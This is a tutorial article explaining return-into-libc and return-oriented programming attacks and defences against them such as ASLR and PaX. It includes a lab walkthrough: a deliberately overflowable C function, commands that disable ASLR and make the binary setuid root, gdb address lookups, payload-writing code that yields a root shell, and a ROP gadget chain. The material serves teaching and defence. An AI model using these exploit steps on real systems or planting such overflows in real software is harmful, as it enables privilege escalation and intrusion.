Return-into-libc Attack and Defense

Source: Internet
Author: User

This article first analyzes the principles of return-into-libc attacks and presents the process and results of traditional return-into-libc attack experiments on different platforms. It then introduces return-oriented programming, an attack method that makes up for the shortcomings of the traditional return-into-libc attack and is more flexible and effective. Finally, it describes defenses against these attacks. The article is intended to help you understand the return-into-libc attack and how to defend a system against it.

Preface

Buffer overflow attacks are among the most common attacks that exploit program defects, and they remain an important security threat.

Buffer overflows feature prominently in security reports. They are easy for attackers to exploit because C and C++ do not automatically detect buffer overflows, and it is difficult for programmers to check every buffer for possible overflow when writing code. By overflowing a buffer, an attacker can write chosen data beyond the buffer's bounds in program memory, including key data that controls the program's execution flow (such as the return address saved by a function call). In this way, the attacker takes control of program execution and carries out malicious behavior.

The common buffer overflow attack injects malicious code (shellcode) into the program and overwrites a function's return address with the address of that code, so that the shellcode runs when the function returns, instead of the code that should have run. In other words, this kind of attack usually begins by injecting malicious code into the vulnerable target program. Because the program's code segment is normally not writable, attackers have to place the attack code on the stack. To prevent such attacks, buffer overflow defenses adopted the non-executable stack, which makes malicious code on the stack impossible to execute. To get around this defense, a new variant of the buffer overflow attack emerged: return-into-libc. A return-into-libc attacker needs neither an executable stack nor any newly injected code. Therefore, to write programs that run safely, you need to know what the return-into-libc attack is, how it works, and which defenses are available.

Data Execution Prevention and return-into-libc attacks

As described in the preface, in a buffer overflow attack the attacker needs to transfer the control flow of the vulnerable program to the attack code. For example, an attacker can overflow a buffer in the vulnerable program to overwrite a function's return address so that it points to injected shellcode; when the function returns, execution jumps to the shellcode. In other words, this attack first injects (writes) malicious code into the target program and later jumps to that code and executes it.

In response to this write-then-execute behavior, researchers proposed Data Execution Prevention (DEP) to help defend against buffer overflow attacks. This security policy controls how a program may access memory: a protected memory region can be either writable or executable, but not both (W xor X), so data cannot be written and then executed. The policy is now widely deployed. The non-executable stack described in the preface is a special case of it: the stack is writable but not executable. Unfortunately, this protection is not completely effective, because it cannot defend against attacks that do not violate the W xor X policy.

The return-into-libc attack never writes code and then executes it, because it does not inject new malicious code. Instead, it reuses functions that already exist in the vulnerable program's address space, redirecting the program to an existing code sequence (such as a library function). During the attack, the attacker still overwrites the return address of a function call, but with the address of an existing function that is useful to the attacker (such as system() in the libc library), and supplies crafted parameters so that the function behaves as the attacker intends. This is why the attack returns into library functions already available to the program: it avoids the injection and execution of attack code that Data Execution Prevention blocks.

Principle of Return-into-libc attack

Return-into-libc attacks make a vulnerable function return into a dynamic library function that already exists in the process's memory space. To understand the attack, we first look at the structure of the stack frame during a function call.

Figure 1. Stack frame structure during a function call


Figure 1 shows the stack frame structure for a typical function call. The stack grows from high addresses toward low addresses: each time a function calls another function, the stack is extended toward lower addresses, and when the function returns, the stack is unwound toward higher addresses. For example, when main() calls func(arg_1, arg_2, arg_3), the parameters arg_1, arg_2, and arg_3 are first pushed onto the stack. In Figure 1 the parameters are pushed from right to left, because that is the order used by the C calling convention on x86. The call instruction then pushes the return address onto the stack and transfers execution to func(). The return address is the address of the instruction that follows the call instruction; it tells func() where in main() execution should resume after the function returns. On entry, func() usually saves main()'s frame base pointer ebp on the stack and copies the current stack pointer esp into ebp, which becomes the frame base of func(). Next, func() allocates stack space for its local variables. At that point the stack frame has the structure shown in Figure 1.

When func() finishes, the leave instruction copies ebp to esp, which discards the local variables, and then pops the saved ebp from the stack back into the ebp register, restoring main()'s frame base. The ret instruction then pops the return address from the stack and jumps to it, so that main() continues executing.

Attackers can use this stack layout to perform the return-into-libc attack. Through a buffer overflow, the attacker overwrites the return address with the address of a library function and writes the parameters that the library function should receive onto the stack. When the vulnerable function returns, control transfers to the library function instead of main(), and the library function picks up the parameter values set by the attacker. The library function thus carries out the malicious behavior on the attacker's behalf. More complex attacks can be built by chaining return-into-libc calls (a series of consecutive library function calls).
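The call and return sequence described above can be sketched with a toy model. This is only an illustration under stated assumptions: the stack is an array of 32-bit words, esp and ebp are array indices rather than real addresses, and the names ToyStack, toy_call, toy_prologue and toy_epilogue are hypothetical helpers, not part of any real API.

```c
#include <assert.h>
#include <stdint.h>

#define STACK_WORDS 64

/* Toy model of a 32-bit x86 stack. Higher index = higher address;
 * the stack grows toward lower indices. */
typedef struct {
    uint32_t mem[STACK_WORDS];
    int esp;  /* index of the word on top of the stack */
    int ebp;  /* index of the current frame base */
} ToyStack;

void toy_init(ToyStack *s) {
    s->esp = STACK_WORDS;
    s->ebp = STACK_WORDS;
}

void toy_push(ToyStack *s, uint32_t v) {
    assert(s->esp > 0);
    s->mem[--s->esp] = v;
}

uint32_t toy_pop(ToyStack *s) {
    assert(s->esp < STACK_WORDS);
    return s->mem[s->esp++];
}

/* Caller side: push the arguments right to left, then "call"
 * pushes the return address. */
void toy_call(ToyStack *s, const uint32_t *args, int nargs, uint32_t ret_addr) {
    for (int i = nargs - 1; i >= 0; i--)
        toy_push(s, args[i]);
    toy_push(s, ret_addr);
}

/* Callee prologue: push %ebp; mov %esp,%ebp; reserve space for locals. */
void toy_prologue(ToyStack *s, int local_words) {
    toy_push(s, (uint32_t)s->ebp);
    s->ebp = s->esp;
    assert(s->esp >= local_words);
    s->esp -= local_words;
}

/* Callee epilogue: leave (mov %ebp,%esp; pop %ebp), then ret pops
 * the return address, which is returned here as the "next eip". */
uint32_t toy_epilogue(ToyStack *s) {
    s->esp = s->ebp;
    s->ebp = (int)toy_pop(s);
    return toy_pop(s);
}
```

In this model the saved ebp sits at mem[ebp], the return address at mem[ebp + 1], and the first argument at mem[ebp + 2], which mirrors the layout in Figure 1. Whatever value occupies the return-address slot when toy_epilogue runs is where execution continues, and that is the slot a buffer overflow targets.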

Return-into-libc attack Experiment

x86 platform attack experiment

The author carried out the return-into-libc attack experiment on an Ubuntu x86 system. In this experiment, the vulnerable program is redirected to the system() function in libc so that system("/bin/sh") is executed. The experiment involves a vulnerable program and an attack program. The attack program first writes the overflow payload to a file, and the vulnerable program then reads that file into its buffer, which causes the overflow. For more details about the attack, see "return-to-libc attack experiment" in the reference resources.

Listing 1. Core content of the vulnerable program

    int bof(FILE *badfile)
    {
        ......
        char buffer[12];
        /* Reads up to 50 bytes into a 12-byte buffer: this is the overflow. */
        fread(buffer, sizeof(char), 50, badfile);
        ......
    }

Listing 1 shows the vulnerable target program. A buffer overflow occurs when it reads the file badfile. For the attack, the four bytes that hold bof's return address, buf[24..27], are overwritten with the entry address of system(); the entry address of exit() is placed in buf[28..31], where it serves as the return address for system(); and the address of the system() parameter "/bin/sh" is placed in buf[32..35]. If the overflow succeeds, bof returns into system(), and exit() is called when system() returns.

Therefore, you must obtain the entry addresses of system() and exit(), and the address of the string "/bin/sh".
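The payload layout just described can be sketched as follows. This is a minimal illustration, not the author's attack program: build_payload, view_after_ret and FakeFrame are hypothetical names, the filler byte 'A' is an assumption, and the offset 24 is taken from the text above (it depends on how the compiler laid out bof's frame). The view function models how a 32-bit x86 CPU would interpret the bytes: bof's ret pops the word at offset 24 into eip, and on entry system() then finds its own return address at the next word and its first argument after that.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum { RET_OFFSET = 24, PAYLOAD_SIZE = 40 };

/* Store and load 32-bit values in little-endian byte order, as x86 does. */
void put_le32(unsigned char *p, uint32_t v) {
    for (int i = 0; i < 4; i++)
        p[i] = (unsigned char)(v >> (8 * i));
}

uint32_t get_le32(const unsigned char *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* What the CPU sees once bof's ret consumes the overwritten return address. */
typedef struct {
    uint32_t eip;             /* popped by bof's ret: entry of system() */
    uint32_t ret_after_call;  /* system()'s return address: exit() */
    uint32_t first_arg;       /* system()'s first argument: "/bin/sh" */
} FakeFrame;

void build_payload(unsigned char *buf, size_t size, uint32_t system_addr,
                   uint32_t exit_addr, uint32_t binsh_addr) {
    assert(size >= RET_OFFSET + 12);
    memset(buf, 'A', size);                        /* filler (assumption) */
    put_le32(buf + RET_OFFSET, system_addr);       /* buf[24..27] */
    put_le32(buf + RET_OFFSET + 4, exit_addr);     /* buf[28..31] */
    put_le32(buf + RET_OFFSET + 8, binsh_addr);    /* buf[32..35] */
}

FakeFrame view_after_ret(const unsigned char *buf) {
    FakeFrame f;
    f.eip = get_le32(buf + RET_OFFSET);
    f.ret_after_call = get_le32(buf + RET_OFFSET + 4);
    f.first_arg = get_le32(buf + RET_OFFSET + 8);
    return f;
}
```

The exit() address is not strictly needed to get a shell. It sits in the slot that system() treats as its return address, so the program terminates cleanly instead of crashing when the shell exits.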

Step 1: Compile the vulnerable program

    sudo sysctl -w kernel.randomize_va_space=0
    gcc -g -fno-stack-protector -o retlibc retlibc.c
    sudo chown root:root retlibc
    sudo chmod 4755 retlibc

Step 2: Place "/bin/sh" in the environment variable BIN_SH and use the getenv() function to obtain its approximate address, 0xbffffe1c. The exact address of the string "/bin/sh" still needs to be confirmed.
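A helper for looking up the address with getenv() might look like the sketch below. The function names locate_env and describe_env are hypothetical, and the sketch assumes the variable was exported in the shell beforehand (for example, export BIN_SH=/bin/sh). The address it prints is only valid for the process that prints it, which is one reason the text calls the result approximate.

```c
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>

/* Return the address of the value of environment variable `name`,
 * or NULL if the variable is not set. */
const char *locate_env(const char *name) {
    assert(name != NULL);
    return getenv(name);
}

/* Print the address and contents of the variable.
 * Returns 1 if it is set, 0 otherwise. */
int describe_env(const char *name) {
    const char *value = locate_env(name);
    if (value == NULL) {
        printf("%s is not set\n", name);
        return 0;
    }
    printf("%s is at %p and contains \"%s\"\n", name, (const void *)value, value);
    return 1;
}
```

Calling describe_env("BIN_SH") from a small main() prints the location of the string in that process. The same variable may land at a slightly different address in the vulnerable program, so the value still has to be checked in gdb as shown next.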

    $ gdb retlibc
    ......
    (gdb) p/x *0xbffffe1c@4
    $1 = {0x5f4e4942, 0x2f3d4853, 0x2f6e6962, 0x48006873}
    (gdb) p/x *0xbffffe23@4
    $2 = {0x6e69622f, 0x68732f, 0x454d4f48, 0x6f682f3d}
    (gdb) x/8ub 0xbffffe23
    0xbffffe23: 47 98 105 110 47 115 104 0
    (gdb)

The last command prints the ASCII codes of the string "/bin/sh", so under gdb the string starts at or near 0xbffffe23. In the actual attack, the string address turned out to be 0xbffffe24, presumably because the environment of a process started under gdb differs slightly from that of a normal run.

Step 3: Use gdb to obtain the entry addresses of system() and exit().
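The four words that gdb printed at 0xbffffe1c can be decoded by hand to see where the string begins. The sketch below does this mechanically; words_to_bytes and find_string are hypothetical helper names, and the only assumption is the little-endian byte order of x86.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Expand 32-bit words into bytes in little-endian order,
 * which is how they lie in x86 memory. */
void words_to_bytes(const uint32_t *words, size_t n, unsigned char *out) {
    assert(words != NULL && out != NULL);
    for (size_t i = 0; i < n; i++)
        for (int b = 0; b < 4; b++)
            out[4 * i + b] = (unsigned char)(words[i] >> (8 * b));
}

/* Return the byte offset of `needle` (including its terminating NUL)
 * within `bytes`, or -1 if it does not occur. */
long find_string(const unsigned char *bytes, size_t len, const char *needle) {
    size_t nlen = strlen(needle) + 1;
    for (size_t off = 0; off + nlen <= len; off++)
        if (memcmp(bytes + off, needle, nlen) == 0)
            return (long)off;
    return -1;
}
```

Applied to the words 0x5f4e4942, 0x2f3d4853, 0x2f6e6962 and 0x48006873, the bytes spell BIN_SH=/bin/sh followed by a NUL, and "/bin/sh" starts at offset 7. Adding 7 to 0xbffffe1c gives 0xbffffe23, which matches the address examined in the gdb session.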

    $ gdb retlibc
    ......
    (gdb) p system
    $1 = {......} 0x168680
    (gdb) p exit
    $2 = {......} 0x15e6e0
    (gdb)

Step 4: With the three addresses in hand, complete the attack program in Listing 2 and launch the attack.

Listing 2. Core content of the attack program

    int main(int argc, char **argv)
    {
        ......
        *(long *) &buf[24] = 0x168680;   // system()
        *(long *) &buf[28] = 0x15e6e0;   // exit()
        *(long *) &buf[32] = 0xbffffe24; // "/bin/sh"
        fwrite(buf, sizeof(buf), 1, badfile);
        ......
    }

Attack

    $ ./retlibc
    # exit
    $

The experiment shows that the return-into-libc attack can be carried out successfully on the x86 platform: system("/bin/sh") is executed and a root shell is obtained. What about the x86_64 platform?

x86_64 platform attack experiment

The experiment on the x86_64 platform is similar to the one on x86. We constructed a fake stack frame for system() and tried to make it execute the command "/bin/sh", but the attack did not succeed. This is because on x86_64, parameters are passed in registers rather than on the stack, while return-into-libc relies on passing parameters through the stack. As a result, system() does not receive the correct parameter. To verify this, we trace execution after entering system() in gdb.

    $ gdb retlibc
    ......
    (gdb) p/x $rdi
    $1 = 0x7fffffffe012
    (gdb) set $rdi=0x7fffffffeddf
    (gdb) c
    Continuing.
    $ pwd
    /home/fmliu/paper
    $

The system() function obtains the address of its parameter "/bin/sh" from the rdi register. In gdb, we therefore reset rdi to the address of the string, after which the attack succeeds. This confirms that the failure is caused by parameters being passed in registers rather than on the stack. Although the traditional return-into-libc method fails on x86_64, the attack can still be carried out there with return-oriented programming, which is discussed in the next section.

Return-Oriented Programming

In the previous experiment, the return-into-libc attack overwrote the return address of a function call with the address of a library function, so that the library function was called when the function returned and the attack succeeded. However, because the only code sequences available to the attacker are whole functions that already exist in the application, the capability of this method is limited. In addition, as discussed in the previous section, the attack worked on the x86 platform but not on x86_64. On the x86_64 platform in our experiment, parameters are passed in registers rather than on the stack, while return-into-libc needs to pass parameters through the stack. Because system() takes its parameter in the %rdi register, the attack fails: the attacker cannot set that register through the stack contents alone.

Because of these limitations, Return-Oriented Programming (ROP) was proposed and has become an effective generalization of the return-into-libc attack. A ROP attack is no longer limited to redirecting the control flow of the vulnerable program to a library function. Instead, the attacker identifies and selects a set of instruction sequences from the program and its libraries, and chains these sequences together to form the shellcode needed for the attack. The attacker can therefore perform arbitrary operations without injecting any new instructions into the vulnerable program. Because ROP does not use complete library functions, it also does not depend on passing function parameters through the stack.

In a return-oriented programming attack, the attacker first selects the instructions from which to build the shellcode. The instructions can come from the application binary or from linked libraries, and together they implement the full functionality of the shellcode. In short, each instruction sequence ends with a return instruction. If the attacker places the address of the first instruction of the next sequence on the stack, then when the return instruction at the end of the current sequence executes, it pops that address from the stack and jumps to the next sequence. Repeating this step, the attacker builds a ROP chain that carries out the entire attack.

For example, in the x86_64 attack, passing the parameter to system() requires setting %rdi to a specific value and then calling system(). This can be achieved by building a ROP chain. An example, shown in Figure 2, is given in "x86_64 buffer overflow exploits and the borrowed code chunks exploitation technique".

Figure 2. Construction of the ROP chain and stack content

Listing 3. Instruction sequence executed by the ROP example

    pop %rbx
    retq
    mov %rbx,%rax
    add $0xe0,%rsp
    pop %rbx
    retq
    mov %rsp,%rdi
    callq *%eax

1. The first two instructions pop the address of system() from the stack into the rbx register and then return, which transfers execution to the third instruction.

2. Instructions 3 through 6 copy rbx into rax, so that rax holds the address of system(), adjust the stack pointer, and return to the next sequence.

3. The last two instructions set the rdi register and call the system() function pointed to by eax.
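The three steps above can be traced with a small simulation. This is a toy model under stated assumptions, not real exploit code: the gadget "addresses" G_POP_RBX, G_MOV_ADD_POP and G_SET_RDI_CALL and the value FAKE_SYSTEM are made-up constants, the stack is an array of 64-bit words indexed by rsp, and rdi holds an index into that array instead of a real pointer. The exact stack layout in build_chain is also an assumption inferred from the instruction sequence in Listing 3.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Made-up "addresses" for the three instruction sequences of Listing 3. */
enum { G_POP_RBX = 0x1001, G_MOV_ADD_POP = 0x1002, G_SET_RDI_CALL = 0x1003,
       FAKE_SYSTEM = 0x5000 };
enum { STACK_WORDS = 48, SKIP_WORDS = 0xe0 / 8 };

typedef struct {
    uint64_t rax, rbx, rdi;
    size_t rsp;                   /* index of the next word to pop */
    uint64_t stack[STACK_WORDS];
    uint64_t called;              /* target of the final call, 0 if none */
} ToyCpu;

uint64_t pop64(ToyCpu *m) {
    assert(m->rsp < STACK_WORDS);
    return m->stack[m->rsp++];
}

/* Lay out the attacker-controlled stack contents. */
void build_chain(ToyCpu *m, const char *cmd) {
    size_t i = 0;
    memset(m, 0, sizeof *m);
    m->stack[i++] = G_POP_RBX;       /* overwritten return address */
    m->stack[i++] = FAKE_SYSTEM;     /* popped into rbx */
    m->stack[i++] = G_MOV_ADD_POP;   /* target of the first retq */
    i += SKIP_WORDS;                 /* skipped by add $0xe0,%rsp */
    m->stack[i++] = 0;               /* junk for the second pop %rbx */
    m->stack[i++] = G_SET_RDI_CALL;  /* target of the second retq */
    assert(strlen(cmd) < sizeof(uint64_t) * (STACK_WORDS - i));
    strcpy((char *)&m->stack[i], cmd);  /* rsp points here at the end */
}

void run_chain(ToyCpu *m) {
    uint64_t pc = pop64(m);          /* the vulnerable function's ret */
    while (m->called == 0) {
        switch (pc) {
        case G_POP_RBX:              /* pop %rbx; retq */
            m->rbx = pop64(m);
            pc = pop64(m);
            break;
        case G_MOV_ADD_POP:          /* mov %rbx,%rax; add $0xe0,%rsp; pop %rbx; retq */
            m->rax = m->rbx;
            m->rsp += SKIP_WORDS;
            m->rbx = pop64(m);
            pc = pop64(m);
            break;
        case G_SET_RDI_CALL:         /* mov %rsp,%rdi; call through rax */
            m->rdi = m->rsp;
            m->called = m->rax;
            break;
        default:
            assert(!"unknown gadget address");
            return;
        }
    }
}
```

After build_chain(&m, "/bin/sh") and run_chain(&m), the model ends with called equal to FAKE_SYSTEM and rdi indexing the command string on the stack. No instruction in the chain was injected: every step is an existing sequence reached through a return.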

From this example we can see that the instruction stream of a ROP attack has a characteristic form: it contains a large number of return instructions. Each instruction sequence is short, usually only two or three assembly instructions, and implements only a small part of the overall shellcode. The sequences are linked through the return instructions to execute the complete shellcode. In a traditional return-into-libc attack, by contrast, each sequence is an entire function rather than a few assembly instructions. ROP therefore works at a lower level of abstraction and is more flexible. There are many techniques for building a ROP chain. For details, see the articles on return-oriented programming in the reference resources.

Defense Mechanism

To defend against general buffer overflow attacks, programmers should, on the one hand, use functions that prevent buffer overflows. On the other hand, defenses can be provided by the system. For example, Data Execution Prevention (DEP) protects the program's memory so that a region cannot be both writable and executable at the same time, which prevents code-injection buffer overflow attacks. However, these mechanisms cannot effectively defend against attacks that reuse existing code, such as return-into-libc and return-oriented programming. Further solutions are therefore needed.

Currently, Address Space Layout Randomization (ASLR) is one of the most effective defenses against return-into-libc and return-oriented programming attacks. ASLR randomizes the addresses of a process's heap, stack, code, and shared libraries on every run of the program. This makes it much harder to locate the code the attacker wants to reuse, and therefore much harder to mount return-into-libc and return-oriented programming attacks. Because the addresses are randomized at run time, the attacker cannot directly determine the memory addresses needed for the attack and can only guess the actual run-time addresses of data and code. A guess is unlikely to be correct, so a successful attack is difficult. A wrong guess is also likely to crash the program, which makes the attack easier to detect.
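As an illustration of the programmer-side defense, the read in Listing 1 can be bounded by the size of the destination buffer. The sketch below is one possible fix under stated assumptions, not the author's code: read_bounded and bof_fixed are hypothetical names, and the elided parts of the original bof are left out.

```c
#include <assert.h>
#include <stdio.h>

/* Read at most `capacity` bytes, so the destination can never overflow. */
size_t read_bounded(FILE *f, char *buffer, size_t capacity) {
    assert(f != NULL && buffer != NULL);
    return fread(buffer, sizeof(char), capacity, f);
}

/* Bounded variant of bof() from Listing 1: the length passed to fread
 * is derived from the buffer itself instead of a hard-coded 50. */
size_t bof_fixed(FILE *badfile) {
    char buffer[12];
    size_t n = read_bounded(badfile, buffer, sizeof(buffer));
    return n;  /* number of bytes actually stored, never more than 12 */
}
```

With a 50-byte input file, bof_fixed stores only the first 12 bytes and leaves the saved frame pointer and return address untouched. Deriving the limit from sizeof(buffer) keeps the bound correct if the buffer size changes later.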
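The effect of ASLR can be observed with a short program that reports where the stack, the heap, and a libc function are located in the current process. This is a minimal sketch: AddrSample, sample_addresses and print_addresses are hypothetical names, and converting a function pointer to an integer is implementation-defined in C, although it works on common Linux platforms.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

typedef struct {
    uintptr_t stack;      /* address of a local variable */
    uintptr_t heap;       /* address returned by malloc() */
    uintptr_t libc_func;  /* address of system() in libc */
} AddrSample;

/* Record one address from each region of the current process. */
AddrSample sample_addresses(void) {
    AddrSample s;
    int local = 0;
    void *h = malloc(16);
    assert(h != NULL);
    s.stack = (uintptr_t)&local;
    s.heap = (uintptr_t)h;
    s.libc_func = (uintptr_t)&system;
    free(h);
    return s;
}

void print_addresses(void) {
    AddrSample s = sample_addresses();
    printf("stack:  %#lx\n", (unsigned long)s.stack);
    printf("heap:   %#lx\n", (unsigned long)s.heap);
    printf("system: %#lx\n", (unsigned long)s.libc_func);
}
```

Calling print_addresses() from main() and running the program several times should print different values on each run when ASLR is enabled. With kernel.randomize_va_space set to 0, as in Step 1 of the experiment, the values are expected to stay the same from run to run, which is what allowed the attack to hard-code addresses.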

PaX

PaX is a Linux kernel patch. Its original feature was to prevent the execution of any data segment, but this alone does not provide sufficient protection against return-into-libc and return-oriented programming attacks. To defend against such attacks, PaX added randomization of the memory addresses of code and data. These features have been widely used in Linux. If the CONFIG_PAX_RANDMMAP option is set during kernel configuration, library functions, stacks, and program base addresses are all mapped to random addresses in memory. PaX randomizes the address space of a process when the program runs and does not require any change to the program itself, which strengthens the defense against attacks that reuse existing legitimate code. The disadvantage of this method is that PaX cannot change the relative order of code or data within the program in memory, which limits how much it raises the difficulty of an attack.

Address Obfuscation

The address obfuscation method can randomize not only the base addresses of the stack, heap, dynamic libraries, functions, and static data, but also the relative addresses of program data (including changing the order of variables or functions). Compared with PaX, it defends not only against attacks that rely on base addresses, but also against attacks that rely on guessing relative addresses. Later, the author of this technique, Bhatkar, proposed a method that randomizes C programs through source-to-source transformation. Every time a program is loaded and run, the virtual memory space of the process is randomized once.

Conclusion

Compared with general buffer overflow attacks, return-into-libc attacks are more difficult to defend against. They can bypass data execution prevention policies, which makes them a more effective and more dangerous form of buffer overflow attack. You therefore need to understand the principles of return-into-libc attacks and how to prevent them in a system. Currently, address space layout randomization (ASLR), as implemented for example by the PaX kernel patch and by address obfuscation, is one of the most effective defenses against return-into-libc attacks. ASLR randomizes the addresses of a process's heap, stack, code, and shared libraries every time the program runs, which makes it difficult for attackers to succeed. It also makes the program more likely to crash during an attack, so the attack is easier to detect. The defense mechanisms described in this article can help readers protect their programs and avoid the security problems caused by return-into-libc attacks.
